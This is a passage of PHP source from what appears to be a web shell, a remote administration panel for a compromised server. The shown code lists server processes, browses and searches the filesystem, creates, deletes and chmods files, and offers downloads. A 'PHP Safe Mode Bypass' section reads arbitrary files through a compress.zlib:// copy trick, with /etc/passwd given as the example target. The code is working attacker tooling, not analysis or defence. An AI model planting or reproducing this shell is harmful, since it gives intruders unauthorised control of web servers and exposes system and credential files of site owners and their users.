3412 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3413
3414 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3415
3416 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3417
3418 while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
3419
3420 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3421
3422 $ret = convert_cyr_string($ret,"d","w");
3423
3424 $stack = explode("\n",$ret);
3425
3426 unset($stack[0],$stack[2]);
3427
3428 $stack = array_values($stack);
3429
3430 $head = explode("",$stack[0]);
3431
3432 $head[1] = explode(" ",$head[1]);
3433
3434 $head[1] = $head[1][0];
3435
3436 $stack = array_slice($stack,1);
3437
3438 unset($head[2]);
3439
3440 $head = array_values($head);
3441
3442 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3443
3444 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3445
3446 if ($k > count($head)) {$k = count($head)-1;}
3447
3448 for($i=0;$i<count($head);$i++)
3449
3450 {
3451
3452 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
3453
3454 }
3455
3456 $prcs = array();
3457
3458 foreach ($stack as $line)
3459
3460 {
3461
3462 if (!empty($line))
3463
3464 {
3465
3466 echo "<tr>";
3467
3468 $line = explode("",$line);
3469
3470 $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
3471
3472 $line[2] = intval(str_replace(" ","",$line[2]))*1024;
3473
3474 $prcs[] = $line;
3475
3476 echo "</tr>";
3477
3478 }
3479
3480 }
3481
3482 }
3483
3484 $head[$k] = "<b>".$head[$k]."</b>".$y;
3485
3486 $v = $processes_sort[0];
3487
3488 usort($prcs,"tabsort");
3489
3490 if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
3491
3492 $tab = array();
3493
3494 $tab[] = $head;
3495
3496 $tab = array_merge($tab,$prcs);
3497
3498 echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
3499
3500 foreach($tab as $i=>$k)
3501
3502 {
3503
3504 echo "<tr>";
3505
3506 foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
3507
3508 echo "</tr>";
3509
3510 }
3511
3512 echo "</table>";
3513
3514 }
3515
3516}
3517
3518if ($act == "ls")
3519{
3520 if (count($ls_arr) > 0) {$list = $ls_arr;}
3521 else
3522 {
3523
3524 $list = array();
3525
3526 if ($h = @opendir($d))
3527
3528 {
3529
3530 while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
3531
3532 closedir($h);
3533
3534 }
3535
3536 else {}
3537
3538 }
3539
3540 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
3541 else
3542 {
3543
3544 //Building array
3545
3546 $objects = array();
3547
3548 $vd = "f"; //Viewing mode
3549
3550 if ($vd == "f")
3551
3552 {
3553
3554 $objects["head"] = array();
3555
3556 $objects["folders"] = array();
3557
3558 $objects["links"] = array();
3559
3560 $objects["files"] = array();
3561
3562 foreach ($list as $v)
3563
3564 {
3565
3566 $o = basename($v);
3567
3568 $row = array();
3569
3570 if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
3571
3572 elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
3573
3574 elseif (is_dir($v))
3575
3576 {
3577
3578 if (is_link($v)) {$type = "LINK";}
3579
3580 else {$type = "DIR";}
3581
3582 $row[] = $v;
3583
3584 $row[] = $type;
3585
3586 }
3587
3588 elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
3589
3590 $row[] = filemtime($v);
3591
3592 if (!$win)
3593
3594 {
3595
3596 $ow = posix_getpwuid(fileowner($v));
3597
3598 $gr = posix_getgrgid(filegroup($v));
3599
3600 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
3601
3602 }
3603
3604 $row[] = fileperms($v);
3605
3606 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
3607
3608 elseif (is_link($v)) {$objects["links"][] = $row;}
3609
3610 elseif (is_dir($v)) {$objects["folders"][] = $row;}
3611
3612 elseif (is_file($v)) {$objects["files"][] = $row;}
3613
3614 $i++;
3615
3616 }
3617
3618 $row = array();
3619
3620 $row[] = "<b>Name</b>";
3621
3622 $row[] = "<b>Size</b>";
3623
3624 $row[] = "<b>Modify</b>";
3625
3626 if (!$win)
3627
3628 {$row[] = "<b>Owner/Group</b>";}
3629
3630 $row[] = "<b>Perms</b>";
3631
3632 $row[] = "<b>Action</b>";
3633
3634 $parsesort = parsesort($sort);
3635
3636 $sort = $parsesort[0].$parsesort[1];
3637
3638 $k = $parsesort[0];
3639
3640 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
3641
3642 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
3643
3644 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
3645
3646 $row[$k] .= $y;
3647
3648 for($i=0;$i<count($row)-1;$i++)
3649
3650 {
3651
3652 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
3653
3654 }
3655
3656 $v = $parsesort[0];
3657
3658 usort($objects["folders"], "tabsort");
3659
3660 usort($objects["links"], "tabsort");
3661
3662 usort($objects["files"], "tabsort");
3663
3664 if ($parsesort[1] == "d")
3665
3666 {
3667
3668 $objects["folders"] = array_reverse($objects["folders"]);
3669
3670 $objects["files"] = array_reverse($objects["files"]);
3671
3672 }
3673
3674 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
3675
3676 $tab = array();
3677
3678 $tab["cols"] = array($row);
3679
3680 $tab["head"] = array();
3681
3682 $tab["folders"] = array();
3683
3684 $tab["links"] = array();
3685
3686 $tab["files"] = array();
3687
3688 $i = 0;
3689
3690 foreach ($objects as $a)
3691
3692 {
3693
3694 $v = $a[0];
3695
3696 $o = basename($v);
3697
3698 $dir = dirname($v);
3699
3700 if ($disp_fullpath) {$disppath = $v;}
3701
3702 else {$disppath = $o;}
3703
3704 $disppath = str2mini($disppath,60);
3705
3706 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
3707
3708 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
3709
3710 foreach ($regxp_highlight as $r)
3711
3712 {
3713
3714 if (ereg($r[0],$o))
3715
3716 {
3717
3718 if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cyb3rexit();}
3719
3720 else
3721
3722 {
3723
3724 $r[1] = round($r[1]);
3725
3726 $isdir = is_dir($v);
3727
3728 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
3729
3730 {
3731
3732 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
3733
3734 $disppath = $r[2].$disppath.$r[3];
3735
3736 if ($r[4]) {break;}
3737
3738 }
3739
3740 }
3741
3742 }
3743
3744 }
3745
3746 $uo = urlencode($o);
3747
3748 $ud = urlencode($dir);
3749
3750 $uv = urlencode($v);
3751
3752 $row = array();
3753
3754 if ($o == ".")
3755
3756 {
3757
3758 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
3759
3760 $row[] = "LINK";
3761
3762 }
3763
3764 elseif ($o == "..")
3765
3766 {
3767
3768 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
3769
3770 $row[] = "LINK";
3771
3772 }
3773
3774 elseif (is_dir($v))
3775
3776 {
3777
3778 if (is_link($v))
3779
3780 {
3781
3782 $disppath .= " => ".readlink($v);
3783
3784 $type = "LINK";
3785
3786 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
3787
3788 }
3789
3790 else
3791
3792 {
3793
3794 $type = "DIR";
3795
3796 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
3797
3798 }
3799
3800 $row[] = $type;
3801
3802 }
3803
3804 elseif(is_file($v))
3805
3806 {
3807
3808 $ext = explode(".",$o);
3809
3810 $c = count($ext)-1;
3811
3812 $ext = $ext[$c];
3813
3814 $ext = strtolower($ext);
3815
3816 $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
3817
3818 $row[] = view_size($a[1]);
3819
3820 }
3821
3822 $row[] = date("d.m.Y H:i:s",$a[2]);
3823
3824 if (!$win) {$row[] = $a[3];}
3825
3826 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
3827
3828 if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
3829
3830 else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
3831
3832 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
3833
3834 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
3835
3836 if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
3837
3838 elseif (is_link($v)) {$tab["links"][] = $row;}
3839
3840 elseif (is_dir($v)) {$tab["folders"][] = $row;}
3841
3842 elseif (is_file($v)) {$tab["files"][] = $row;}
3843
3844 $i++;
3845
3846 }
3847
3848 }
3849
3850 // Compiling table
3851
3852 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
3853
3854 echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#15354c borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
3855
3856 foreach($table as $row)
3857
3858 {
3859
3860 echo "<tr>\r\n";
3861
3862 foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
3863
3864 echo "</tr>\r\n";
3865
3866 }
3867
3868 echo "</table><br><hr size=\"1\" noshade><p align=\"right\">
3869
3870 <script>
3871
3872 function ls_setcheckboxall(status)
3873
3874 {
3875
3876 var id = 1;
3877
3878 var num = ".(count($table)-2).";
3879
3880 while (id <= num)
3881
3882 {
3883
3884 document.getElementById('actbox'+id).checked = status;
3885
3886 id++;
3887
3888 }
3889
3890 }
3891
3892 function ls_reverse_all()
3893
3894 {
3895
3896 var id = 1;
3897
3898 var num = ".(count($table)-2).";
3899
3900 while (id <= num)
3901
3902 {
3903
3904 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
3905
3906 id++;
3907
3908 }
3909
3910 }
3911
3912 </script>
3913
3914 <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
3915
3916 <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
3917
3918 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
3919
3920 {
3921
3922 echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
3923
3924 }
3925
3926 echo "<select name=act><option value=\"".$act."\">With selected:</option>";
3927
3928 echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
3929
3930 echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
3931
3932 if ($usefsbuff)
3933
3934 {
3935
3936 echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
3937
3938 echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
3939
3940 echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
3941
3942 }
3943
3944 echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
3945
3946 echo "</form><hr size=\"1\" noshade>";
3947 }
3948 ?>
3949<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" borderColorLight=#c0c0c0 border=1>
3950 <tr> <!-- 1 -->
3951 <td valign="top" width="33%" ><p align="center"><b>:: PHP Safe Mode Bypass ::</b></p></td>
3952 <td valign="top" width="33%" ><p align="center"><b>:: Make File/Directory ::</b></p></td>
3953 <td valign="top" ><p align="center"><b>:: Go File/Directory ::</b></p></td>
3954 </tr>
3955 <tr><!-- 3 -->
3956 <td valign="top">
3957
3958 <center><b>(: List Directories :)</b> <form action="<?php echo $surl; ?>">
3959
3960 <div align="center"><br>
3961
3962 Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br></div>
3963<?php
3964
3965
3966
3967 function rsg_glob()
3968
3969{
3970
3971$chemin=$_GET['directory'];
3972
3973$files = glob("$chemin*");
3974
3975echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
3976
3977foreach ($files as $filename) {
3978
3979 echo "<pre>";
3980
3981 echo "$filename\n";
3982
3983 echo "</pre>";
3984
3985}
3986
3987}
3988
3989
3990
3991if(isset($_GET['directory']))
3992
3993{
3994
3995rsg_glob();
3996
3997}
3998
3999
4000
4001?>
4002
4003
4004 </form></center>
4005
4006 </td>
4007 <td>
4008 <center><b>[: Make Directory :]</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
4009 </td>
4010 <td>
4011 <center><b>{: Go Directory :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
4012 </td>
4013 </tr>
4014 <tr><!-- 2 -->
4015 <td valign="top">
4016
4017 <div align="center"><b>(: Read Files :)</b></div><br>
4018
4019 <form action="<?php echo $surl; ?>">
4020
4021 <div align="center">File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
4022 <?php
4023
4024 function rsg_read()
4025
4026 {
4027
4028 $test="";
4029
4030 $temp=tempnam($test, "cx");
4031
4032 $file=$_GET['file'];
4033
4034 $get=htmlspecialchars($file);
4035
4036 echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
4037
4038 if(copy("compress.zlib://".$file, $temp)){
4039
4040 $fichier = fopen($temp, "r");
4041
4042 $action = fread($fichier, filesize($temp));
4043
4044 fclose($fichier);
4045
4046 $source=htmlspecialchars($action);
4047
4048 echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
4049
4050 unlink($temp);
4051
4052 } else {
4053
4054 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
4055
4056 <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
4057
4058 access.</CENTER></FONT>");
4059
4060 }
4061
4062 echo "</div>";
4063
4064 }
4065
4066
4067
4068 if(isset($_GET['file']))
4069
4070{
4071
4072rsg_read();
4073
4074}
4075
4076
4077
4078 ?>
4079
4080
4081 <br>
4082
4083 </div>
4084
4085 </form>
4086
4087 </td>
4088 <td >
4089 <center><b>[: Make File :]</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center>
4090 </td>
4091 <td>
4092 <center><b>{: Go File :}</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center>
4093 </td>
4094
4095 </tr>
4096
4097 </table> <?php
4098 }
4099
4100
4101if ($act == "delete")
4102
4103{
4104
4105 $delerr = "";
4106
4107 foreach ($actbox as $v)
4108
4109 {
4110
4111 $result = FALSE;
4112
4113 $result = fs_rmobj($v);
4114
4115 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
4116
4117 }
4118
4119 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
4120
4121 $act = "ls";
4122
4123}
4124
4125if ($act == "chmod")
4126
4127{
4128
4129 $mode = fileperms($d.$f);
4130
4131 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
4132
4133 else
4134
4135 {
4136
4137 $form = TRUE;
4138
4139 if ($chmod_submit)
4140
4141 {
4142
4143 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
4144
4145 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
4146
4147 else {$err = "Can't chmod to ".$octet.".";}
4148
4149 }
4150
4151 if ($form)
4152
4153 {
4154
4155 $perms = parse_perms($mode);
4156
4157 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
4158
4159 }
4160
4161 }
4162
4163}
4164
4165if ($act == "search")
4166
4167{
4168
4169 echo "<b>Search in file-system:</b><br>";
4170
4171 if (empty($search_in)) {$search_in = $d;}
4172
4173 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
4174
4175 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
4176
4177 if (!empty($submit))
4178
4179 {
4180
4181 $found = array();
4182
4183 $found_d = 0;
4184
4185 $found_f = 0;
4186
4187 $search_i_f = 0;
4188
4189 $search_i_d = 0;
4190
4191 $a = array
4192
4193 (
4194
4195 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
4196
4197 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
4198
4199 "text_wwo"=>$search_text_wwo,
4200
4201 "text_cs"=>$search_text_cs,
4202
4203 "text_not"=>$search_text_not
4204
4205 );
4206
4207 $searchtime = getmicrotime();
4208
4209 $in = array_unique(explode(";",$search_in));
4210
4211 foreach($in as $v) {cyb3rfsearch($v);}
4212
4213 $searchtime = round(getmicrotime()-$searchtime,4);
4214
4215 if (count($found) == 0) {echo "<b>No files found!</b>";}
4216
4217 else
4218
4219 {
4220
4221 $ls_arr = $found;
4222
4223 $disp_fullpath = TRUE;
4224
4225 $act = "ls";
4226
4227 }
4228
4229 }
4230
4231 echo "<form method=POST>
4232
4233<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
4234
4235<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
4236
4237<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
4238
4239<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
4240
4241<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
4242
4243&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
4244
4245&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
4246
4247&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
4248
4249<br><br><input type=submit name=submit value=\"Search\"></form>";
4250
4251 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
4252
4253}
4254
4255if ($act == "fsbuff")
4256
4257{
4258
4259 $arr_copy = $sess_data["copy"];
4260
4261 $arr_cut = $sess_data["cut"];
4262
4263 $arr = array_merge($arr_copy,$arr_cut);
4264
4265 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
4266
4267 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
4268
4269}
4270
4271if ($act == "d")
4272
4273{
4274
4275 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
4276
4277 else
4278
4279 {
4280
4281 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
4282
4283 if (!$win)
4284
4285 {
4286
4287 echo "<tr><td><b>Owner/Group</b></td><td> ";
4288
4289 $ow = posix_getpwuid(fileowner($d));
4290
4291 $gr = posix_getgrgid(filegroup($d));
4292
4293 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
4294
4295 }
4296
4297 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
4298
4299 }
4300
4301}
4302
4303if ($act == "chmod")
4304
4305{
4306
4307 $mode = fileperms($d.$f);
4308
4309 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
4310
4311 else
4312
4313 {
4314
4315 $form = TRUE;
4316
4317 if ($chmod_submit)
4318
4319 {
4320
4321 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
4322
4323 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
4324
4325 else {$err = "Can't chmod to ".$octet.".";}
4326
4327 }
4328
4329 if ($form)
4330
4331 {
4332
4333 $perms = parse_perms($mode);
4334
4335 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
4336
4337 }
4338
4339 }
4340
4341}
4342
4343if ($act == "f")
4344
4345{
4346
4347 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
4348
4349 {
4350
4351 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
4352
4353 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
4354
4355 }
4356
4357 else
4358
4359 {
4360
4361 $r = @file_get_contents($d.$f);
4362
4363 $ext = explode(".",$f);
4364
4365 $c = count($ext)-1;
4366
4367 $ext = $ext[$c];
4368
4369 $ext = strtolower($ext);
4370
4371 $rft = "";
4372
4373 foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
4374
4375 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
4376
4377 if (empty($ft)) {$ft = $rft;}
4378
4379 $arr = array(
4380
4381 array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
4382
4383 array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
4384
4385 array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
4386
4387 array("Code","code"),
4388
4389 array("Session","phpsess"),
4390
